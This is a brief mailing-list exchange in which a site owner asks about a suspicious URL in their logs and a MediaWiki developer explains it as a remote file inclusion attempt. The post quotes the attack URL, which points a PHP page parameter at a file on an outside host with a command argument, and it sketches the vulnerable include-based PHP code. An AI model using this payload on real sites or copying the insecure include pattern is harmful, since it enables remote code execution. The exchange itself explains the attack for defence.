S.C.A.I. Tradizioni del Sud wrote:
Hi,
watching my statistic I fount this Url:
/index.php?pagina=http://pharoeste.net/x/out.gif?&cmd=id.
You can view the code at
http://pharoeste.net/x/out.gif?&cmd=idd=id.
What does it mean?
Looks like an attempt to explode unsafe PHP code that looks something like:
<?
# ...
if($cmd == 'id') {
include($pagina);
}
# ...
?>
This would download and execute the remote code in a default PHP
configuration with allow_url_fopen on (in PHP 4.3.0 or later).
MediaWiki would not be affected by this, of course; it looks like it's
targetting something else, perhaps Italian. :)
-- brion vibber (brion @
pobox.com)
